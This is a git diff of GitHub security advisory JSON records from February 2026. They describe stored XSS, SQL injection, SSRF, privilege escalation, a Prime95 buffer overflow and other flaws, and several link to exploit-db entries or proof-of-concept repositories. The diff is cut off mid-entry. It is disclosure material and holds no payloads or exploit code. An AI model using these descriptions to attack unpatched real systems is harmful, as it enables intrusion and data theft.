--- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wvch-mq77-2vf3/GHSA-wvch-mq77-2vf3.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvch-mq77-2vf3", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2025-13648" + ], + "details": "An attacker with access to the web application ZeusWeb of the provider Microcom\n\n (in this case, registration is required) who has the vulnerable software could introduce arbitrary JavaScript by injecting an XSS payload into the ‘Name’ and “Surname” parameters within the ‘My Account’ section at the URL: https://zeus.microcom.es:4040/administracion-estaciones.html  resulting in a stored XSS.\nThis issue affects ZeusWeb: 6.1.31.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13648" + }, + { + "type": "WEB", + "url": "https://www.hackrtu.com/blog/CNA-CVE-2025-13648" + }, + { + "type": "WEB", + "url": "https://www.hackrtu.com/blog/CNA-HRTU-0001" + }, + { + "type": "WEB", + "url": "https://www.microcom360.com/servicio-zeus-web" + }, + { + "type": "WEB", + "url": "https://zeus.microcom.es:4040" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wvrh-v9qh-4m3c/GHSA-wvrh-v9qh-4m3c.json b/advisories/unreviewed/2026/02/GHSA-wvrh-v9qh-4m3c/GHSA-wvrh-v9qh-4m3c.json new file mode 100644 index 0000000000000..b13e77080eae7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wvrh-v9qh-4m3c/GHSA-wvrh-v9qh-4m3c.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvrh-v9qh-4m3c", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2025-14342" + ], + "details": "The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the sq_ajax_uninstall function in all versions up to, and including, 12.4.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disconnect the site from Squirrly's cloud service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14342" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/squirrly-seo/tags/12.4.14/controllers/SeoSettings.php#L616" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3435711" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ad25948-3265-4c4c-9b99-86f7240600ce?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json b/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json new file mode 100644 index 0000000000000..c7882935d1b95 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvvh-pcq5-hc6f", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33250" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33250" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33250" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wvx5-w592-wf52/GHSA-wvx5-w592-wf52.json b/advisories/unreviewed/2026/02/GHSA-wvx5-w592-wf52/GHSA-wvx5-w592-wf52.json new file mode 100644 index 0000000000000..d81a098f53daf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wvx5-w592-wf52/GHSA-wvx5-w592-wf52.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvx5-w592-wf52", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2026-1320" + ], + "details": "The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'X-Forwarded-For' HTTP header in all versions up to, and including, 4.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1320" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3449531/secure-copy-content-protection" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4dd681d-90cb-44dc-adf0-d7e269d15a60?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json b/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json new file mode 100644 index 0000000000000..e9668086651a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ww2j-3p54-3m69", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-8781" + ], + "details": "The Bookster – WordPress Appointment Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘raw’ parameter in all versions up to, and including, 2.1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8781" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/bookster/trunk/src/Models/Database/QueryBuilder.php#L133" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3434484" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1fc5f0ac-3323-4e6c-8900-10e13294ff9a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json b/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json new file mode 100644 index 0000000000000..e6e0fe1cba379 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ww95-r66q-v2hh", + "modified": "2026-02-19T15:30:35Z", + "published": "2026-02-19T15:30:35Z", + "aliases": [ + "CVE-2025-55853" + ], + "details": "SoftVision webPDF before 10.0.2 is vulnerable to Server-Side Request Forgery (SSRF). The PDF converter function does not check if internal or external resources are requested in the uploaded files and allows for protocols such as http:// and file:///. This allows an attacker to upload an XML or HTML file in the application, which when rendered to a PDF allows for internal port scanning and Local File Inclusion (LFI).", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55853" + }, + { + "type": "WEB", + "url": "https://github.com/Vivz13/CVE-2025-55853/tree/main" + }, + { + "type": "WEB", + "url": "https://www.webpdf.de" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T15:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wwq9-vrr3-45wf/GHSA-wwq9-vrr3-45wf.json b/advisories/unreviewed/2026/02/GHSA-wwq9-vrr3-45wf/GHSA-wwq9-vrr3-45wf.json new file mode 100644 index 0000000000000..6e32cbecf7097 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wwq9-vrr3-45wf/GHSA-wwq9-vrr3-45wf.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wwq9-vrr3-45wf", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2026-1373" + ], + "details": "The Easy Author Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'author_profile_picture_url' parameter in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1373" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/easy-author-image/tags/1.7/easy-author-image.php#L149" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eaa53088-c383-4315-9871-b4ceb83f5fdb?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wx45-vx6h-76cq/GHSA-wx45-vx6h-76cq.json b/advisories/unreviewed/2026/02/GHSA-wx45-vx6h-76cq/GHSA-wx45-vx6h-76cq.json new file mode 100644 index 0000000000000..5a2564361f265 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wx45-vx6h-76cq/GHSA-wx45-vx6h-76cq.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx45-vx6h-76cq", + "modified": "2026-02-13T21:31:35Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20636" + ], + "details": "The issue was addressed with improved memory handling. This issue is fixed in iOS 26.3 and iPadOS 26.3, Safari 26.3, macOS Tahoe 26.3, visionOS 26.3. Processing maliciously crafted web content may lead to an unexpected process crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20636" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126354" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wx79-r7m5-q3gg/GHSA-wx79-r7m5-q3gg.json b/advisories/unreviewed/2026/02/GHSA-wx79-r7m5-q3gg/GHSA-wx79-r7m5-q3gg.json new file mode 100644 index 0000000000000..10cc6ec259bab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wx79-r7m5-q3gg/GHSA-wx79-r7m5-q3gg.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx79-r7m5-q3gg", + "modified": "2026-02-15T18:30:24Z", + "published": "2026-02-15T18:30:24Z", + "aliases": [ + "CVE-2026-26369" + ], + "details": "eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/management specifying their own username to elevate their account to the UG_ADMIN group, bypassing intended access controls and gaining administrative capabilities such as modifying device configurations, network settings, and other smart home system functions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26369" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/jung-enet-smart-home-server-privilege-escalation-v" + }, + { + "type": "WEB", + "url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5975.php" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-15T16:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json b/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json new file mode 100644 index 0000000000000..2364f3a755ee7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxhm-86c2-x66c", + "modified": "2026-02-18T09:31:03Z", + "published": "2026-02-18T09:31:03Z", + "aliases": [ + "CVE-2026-1640" + ], + "details": "The Taskbuilder – WordPress Project Management & Task Management plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 5.0.2. This is due to missing authorization checks on the project and task comment submission functions (AJAX actions: wppm_submit_proj_comment and wppm_submit_task_comment). This makes it possible for authenticated attackers, with subscriber-level access and above, to create comments on any project or task (including private projects they cannot view or are not assigned to), and inject arbitrary HTML and CSS via the insufficiently sanitized comment_body parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1640" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/open_project/wppm_submit_project_comment.php#L6" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/tasks/open_task/wppm_submit_task_comment.php#L6" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/66095908-875f-486d-ae77-6015671872de?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wxpc-f9fq-w9pq/GHSA-wxpc-f9fq-w9pq.json b/advisories/unreviewed/2026/02/GHSA-wxpc-f9fq-w9pq/GHSA-wxpc-f9fq-w9pq.json index 46321191a0f21..31fc90fce35ae 100644 --- a/advisories/unreviewed/2026/02/GHSA-wxpc-f9fq-w9pq/GHSA-wxpc-f9fq-w9pq.json +++ b/advisories/unreviewed/2026/02/GHSA-wxpc-f9fq-w9pq/GHSA-wxpc-f9fq-w9pq.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-610" + "CWE-610", + "CWE-611" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json new file mode 100644 index 0000000000000..4c28aa477e6c3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxwg-9693-mqg4", + "modified": "2026-02-13T15:30:24Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20656" + ], + "details": "A logic issue was addressed with improved validation. This issue is fixed in iOS 18.7.5 and iPadOS 18.7.5, Safari 26.3, macOS Tahoe 26.3. An app may be able to access a user's Safari history.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20656" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126354" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wxxw-44fp-jqf8/GHSA-wxxw-44fp-jqf8.json b/advisories/unreviewed/2026/02/GHSA-wxxw-44fp-jqf8/GHSA-wxxw-44fp-jqf8.json new file mode 100644 index 0000000000000..4f3ebca1f034e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wxxw-44fp-jqf8/GHSA-wxxw-44fp-jqf8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxxw-44fp-jqf8", + "modified": "2026-02-19T18:31:52Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25389" + ], + "details": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Metagauss EventPrime eventprime-event-calendar-management allows Retrieve Embedded Sensitive Data.This issue affects EventPrime: from n/a through <= 4.2.8.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25389" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/eventprime-event-calendar-management/vulnerability/wordpress-eventprime-plugin-4-2-8-3-sensitive-data-exposure-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-497" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x252-4r5q-2hc6/GHSA-x252-4r5q-2hc6.json b/advisories/unreviewed/2026/02/GHSA-x252-4r5q-2hc6/GHSA-x252-4r5q-2hc6.json new file mode 100644 index 0000000000000..86fec0dd0d8f9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x252-4r5q-2hc6/GHSA-x252-4r5q-2hc6.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x252-4r5q-2hc6", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25327" + ], + "details": "Prime95 version 29.8 build 6 contains a buffer overflow vulnerability in the user ID input field that allows remote attackers to execute arbitrary code. Attackers can craft a malicious payload and paste it into the PrimeNet user ID and proxy host fields to trigger a bind shell on port 3110.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25327" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47802" + }, + { + "type": "WEB", + "url": "https://www.mersenne.org" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/prime-version-build-buffer-overflow-seh" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x2gm-g5r6-83jw/GHSA-x2gm-g5r6-83jw.json b/advisories/unreviewed/2026/02/GHSA-x2gm-g5r6-83jw/GHSA-x2gm-g5r6-83jw.json index 3359cb801c635..0c353bdb48ad9 100644 --- a/advisories/unreviewed/2026/02/GHSA-x2gm-g5r6-83jw/GHSA-x2gm-g5r6-83jw.json +++ b/advisories/unreviewed/2026/02/GHSA-x2gm-g5r6-83jw/GHSA-x2gm-g5r6-83jw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-x2gm-g5r6-83jw", - "modified": "2026-02-03T18:30:47Z", + "modified": "2026-02-11T18:31:25Z", "published": "2026-02-03T18:30:47Z", "aliases": [ "CVE-2025-70311" ], "details": "JEEWMS 1.0 is vulnerable to SQL Injection. Attackers can inject malicious SQL statements through the id1 and id2 parameters in the /systemControl.do interface for attack.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-03T18:16:17Z" diff --git a/advisories/unreviewed/2026/02/GHSA-x2mr-3x78-f97g/GHSA-x2mr-3x78-f97g.json b/advisories/unreviewed/2026/02/GHSA-x2mr-3x78-f97g/GHSA-x2mr-3x78-f97g.json new file mode 100644 index 0000000000000..01a8b408dde41 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x2mr-3x78-f97g/GHSA-x2mr-3x78-f97g.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x2mr-3x78-f97g", + "modified": "2026-02-14T18:30:16Z", + "published": "2026-02-14T18:30:16Z", + "aliases": [ + "CVE-2026-23206" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndpaa2-switch: prevent ZERO_SIZE_PTR dereference when num_ifs is zero\n\nThe driver allocates arrays for ports, FDBs, and filter blocks using\nkcalloc() with ethsw->sw_attr.num_ifs as the element count. When the\ndevice reports zero interfaces (either due to hardware configuration\nor firmware issues), kcalloc(0, ...) returns ZERO_SIZE_PTR (0x10)\ninstead of NULL.\n\nLater in dpaa2_switch_probe(), the NAPI initialization unconditionally\naccesses ethsw->ports[0]->netdev, which attempts to dereference\nZERO_SIZE_PTR (address 0x10), resulting in a kernel panic.\n\nAdd a check to ensure num_ifs is greater than zero after retrieving\ndevice attributes. This prevents the zero-sized allocations and\nsubsequent invalid pointer dereference.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23206" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/155eb99aff2920153bf21217ae29565fff81e6af" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2fcccca88456b592bd668db13aa1d29ed257ca2b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4acc40db06ffd0fd92683505342b00c8a7394c60" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/80165ff16051448d6f840585ebe13f2400415df3" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b97415c4362f739e25ec6f71012277086fabdf6f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ed48a84a72fefb20a82dd90a7caa7807e90c6f66" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x32x-hhm5-vhhg/GHSA-x32x-hhm5-vhhg.json b/advisories/unreviewed/2026/02/GHSA-x32x-hhm5-vhhg/GHSA-x32x-hhm5-vhhg.json new file mode 100644 index 0000000000000..6618f9d91d327 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x32x-hhm5-vhhg/GHSA-x32x-hhm5-vhhg.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x32x-hhm5-vhhg", + "modified": "2026-02-16T18:31:29Z", + "published": "2026-02-16T18:31:29Z", + "aliases": [ + "CVE-2019-25387" + ], + "details": "Smoothwall Express 3.1-SP4-polar-x86_64-update9 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting crafted input to the xtaccess.cgi endpoint. Attackers can inject script payloads through the EXT, DEST_PORT, or COMMENT parameters via POST requests to execute arbitrary JavaScript in victim browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25387" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46333" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/smoothwall-express-xtaccesscgi-cross-site-scriptin" + }, + { + "type": "WEB", + "url": "http://www.smoothwall.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T18:19:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x35m-4mv2-6m4p/GHSA-x35m-4mv2-6m4p.json b/advisories/unreviewed/2026/02/GHSA-x35m-4mv2-6m4p/GHSA-x35m-4mv2-6m4p.json new file mode 100644 index 0000000000000..752bffb7e51a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x35m-4mv2-6m4p/GHSA-x35m-4mv2-6m4p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x35m-4mv2-6m4p", + "modified": "2026-02-11T12:30:21Z", + "published": "2026-02-11T12:30:21Z", + "aliases": [ + "CVE-2025-15096" + ], + "details": "The 'Videospirecore Theme Plugin' plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.6. This is due to the plugin not properly validating a user's identity prior to updating their 